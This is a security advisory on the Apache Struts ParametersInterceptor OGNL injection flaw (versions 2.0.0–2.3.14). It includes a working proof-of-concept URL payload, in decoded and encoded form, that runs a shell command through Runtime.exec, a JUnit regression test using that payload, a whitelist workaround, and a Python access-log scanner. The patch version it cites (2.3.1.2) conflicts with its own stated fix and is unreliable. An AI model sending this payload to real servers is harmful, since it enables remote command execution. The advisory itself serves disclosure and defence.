Apache Struts "ParameterInterceptor" Security Bypass Vulnerability

Published: 2013-05-22
Updated: 2013-05-23

Affected systems:
Apache Group Struts 2.0.0 - 2.3.14
Description:
--------------------------------------------------------------------------------
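Apache Struts is an open-source web application framework for developing Java web applications.
 
Versions of Apache Struts before 2.3.14.1 contain an error in the implementation of the "ParameterInterceptor" class. It can be exploited to modify server-side objects, and specially crafted OGNL expressions can bypass the protections of ParametersInterceptor and the OGNL library, resulting in arbitrary command execution.
 
<*Source: Xgc Kxlzx
 
  Links: http://secunia.com/advisories/53495/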
        http://struts.apache.org/development/2.x/docs/s2-012.html
        http://struts.apache.org/development/2.x/docs/s2-013.html
        http://www.freebuf.com/vuls/9757.html
        http://struts.apache.org/development/2.x/docs/security-bulletins.html
 *>

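Test method:
--------------------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!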
Proof of concept
 Vulnerable Action
 public class FooAction {
    private String foo;
 
    public String execute() {
        return "success";
    }
    public String getFoo() {
        return foo;
    }
 
    public void setFoo(String foo) {
        this.foo = foo;
    }
 }
 
Here's an actual decoded example, which will create /tmp/PWNAGE directory:
 
/action?foo=(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Runtime@getRuntime().exec('mkdir /tmp/PWNAGE'))(meh)&z[(foo)('meh')]=true
 encoded version:
 
/action?foo=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D+new+java.lang.Boolean%28false%29,%20%23_memberAccess[%22allowStaticMethodAccess%22]%3d+new+java.lang.Boolean%28true%29,%20@java.lang.Runtime@getRuntime%28%29.exec%28%27mkdir%20/tmp/PWNAGE%27%29%29%28meh%29&z[%28foo%29%28%27meh%27%29]=true
 And the JUnit version
 
PoC
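 import java.io.File;
 import org.junit.Assert;
 import org.junit.Test;

 // Regression test: passes only when the /tmp/PWNAGE directory is NOT created.
 public class FooActionTest extends org.apache.struts2.StrutsJUnit4TestCase<FooAction> {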
    @Test
    public void testExecute() throws Exception {
        request.setParameter("foo", "(#context[\"xwork.MethodAccessor.denyMethodExecution\"]= new " +
                "java.lang.Boolean(false), #_memberAccess[\"allowStaticMethodAccess\"]= new java.lang.Boolean(true), " +
                "@java.lang.Runtime@getRuntime().exec('mkdir /tmp/PWNAGE'))(meh)");
 
        request.setParameter("top['foo'](0)", "true");
 
        String res = this.executeAction("/example/foo.action");
        FooAction action = this.getAction();
 
        File pwn = new File("/tmp/PWNAGE");
        Assert.assertFalse("Remote exploit: The PWN folder has been created", pwn.exists());
    }
 }

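Recommendations:
--------------------------------------------------------------------------------
Temporary workaround:
 
If you cannot install the patch or upgrade immediately, NSFOCUS recommends taking the following measures to reduce the threat:
 
* Configure ParametersInterceptor in struts.xml to exclude malicious parameters. In addition, correctly applying the following interceptor-ref configuration allows only simple navigation expressions: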
 <interceptor-ref name="params">
    <param name="acceptParamNames">\w+((\.\w+)|(\[\d+\])|(\['\w+'\]))*</param>
 </interceptor-ref>
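
To check whether past requests would have been rejected by this whitelist, the following added example (not part of the original advisory or of Struts) applies the same pattern to query parameter names found in web server access logs. The log layout, the sample lines and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Whitelist copied from the acceptParamNames workaround above. re.ASCII keeps
# \w and \d ASCII-only, which is the default behaviour of java.util.regex.
ACCEPT_PARAM_NAMES = re.compile(r"\w+((\.\w+)|(\[\d+\])|(\['\w+'\]))*", re.ASCII)

# Assumed log layout: common/combined access log with a quoted request line.
REQUEST_LINE = re.compile(r'"(?:GET|POST|PUT|DELETE|HEAD) (\S+) HTTP/[\d.]+"')


def rejected_param_names(url):
    """Return the URL-decoded query parameter names that fail the whitelist."""
    query = urlsplit(url).query
    names = [name for name, _ in parse_qsl(query, keep_blank_values=True)]
    # fullmatch: the whole name must be a simple navigation expression.
    return [n for n in names if not ACCEPT_PARAM_NAMES.fullmatch(n)]


def scan(log_lines):
    """Yield (line_number, rejected_names) for each request worth reviewing."""
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_LINE.search(line)
        if not match:
            continue  # not a request line in the assumed layout
        bad = rejected_param_names(match.group(1))
        if bad:
            yield number, bad


# Constructed sample log lines (not real traffic). The third line reuses the
# parameter *name* from the advisory's PoC; its value is a placeholder.
SAMPLE_LOG = [
    '192.0.2.10 - - [22/May/2013:10:00:01 +0000] '
    '"GET /example/foo.action?foo=bar&user.name=alice HTTP/1.1" 200 512',
    '192.0.2.10 - - [22/May/2013:10:00:02 +0000] '
    '"GET /example/foo.action?items[0]=1&map[\'key\']=v HTTP/1.1" 200 512',
    '198.51.100.7 - - [22/May/2013:10:00:03 +0000] '
    '"GET /action?foo=PLACEHOLDER&z[%28foo%29%28%27meh%27%29]=true HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for number, names in scan(SAMPLE_LOG):
        print(f"line {number}: rejected parameter names {names}")
```

Only GET query strings are covered; parameters sent in POST bodies do not appear in standard access logs and need application-level logging.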
 
Vendor patch:
 
Apache Group
 ------------
 The vendor has released an upgrade patch that fixes this security issue. Download Struts 2.3.1.2 from the vendor's home page:
 
http://struts.apache.org/download.cgi#struts2312
